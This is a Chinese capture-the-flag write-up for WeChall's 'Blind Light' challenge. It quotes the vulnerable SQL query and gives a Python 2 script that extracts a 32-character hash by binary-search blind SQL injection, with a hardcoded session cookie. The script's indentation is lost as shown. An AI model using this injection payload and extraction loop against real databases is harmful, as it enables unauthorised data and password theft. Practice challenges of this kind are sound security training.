題目提示:
1. Your mission is to extract an md5 password hash out of a database.
需要獲取數據庫中的密碼信息,而密碼是經過MD5加密的。
2. Your limit for this blind sql injection are 128 queries.
最多可以注入128次,通過查看源代碼可以看到超過了就會重新生成密碼。
3. 可以查看部分關鍵源代碼
$query = "SELECT 1 FROM (SELECT password FROM blight WHERE sessid=$sessid) b WHERE password='$password'";
通過源代碼可以看到存在注入漏洞,但是隻能進行是或否的判斷。
$hash = GWF_Random::randomKey(32, 'ABCDEF0123456789');
密碼是隨機生成的32位字符串,爲大寫A-F,0-9。
解題:
通過二叉樹法對32位密碼的每一位進行判斷,四次可以得到一位的值,32*4=128,正好128次注入可以得到密碼,Python腳本如下:
# -*- coding: utf-8 -*-
import urllib2
import urllib
import cookielib
import string
import re
import Cookie
ml= ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'];
# 設置一個cookie處理器
cj = cookielib.CookieJar();
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj));
urllib2.install_opener(opener);
for lindex in range(32):
xj= 0;
xvalue= 16;
for sindex in range(4):
if xj>0:
xvalue= xvalue + 16 / (2 ** (sindex + 1));
else:
xvalue= xvalue - 16 / (2 ** (sindex + 1));
# second time do url request, the cookiejar will auto handle the cookie
loginBaiduUrl = "http://www.wechall.net/challenge/blind_light/index.php";
strinject = '1\' or ascii(substr(password,%d,1))>%d #' % (lindex+1,ord(ml[xvalue-1]));
#print strinject;
para = {
'injection' : strinject,
'inject' : 'Inject',
};
postData = urllib.urlencode(para);
req = urllib2.Request(loginBaiduUrl, postData);
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0');
req.add_header('Content-Type', 'application/x-www-form-urlencoded');
req.add_header('Cookie', 'WC=8624571-16186-h8NKQBMCengtEsn4');
req.add_header('Referer', 'http://www.wechall.net/challenge/blind_light/index.php');
req.add_header('Connection', 'close');
resp = urllib2.urlopen(req);
respInfo = resp.info();
# 通過正則匹配抓到需要統計的字符串
content = resp.read()
check_text = re.findall('(attempt[s\.\!]{1,2})</li>',content,re.S)[0]
#print check_text
if check_text=='attempt!':
xj=0;
else:
xj=1;
if xj==0:
print ml[xvalue-1];
else:
print ml[xvalue];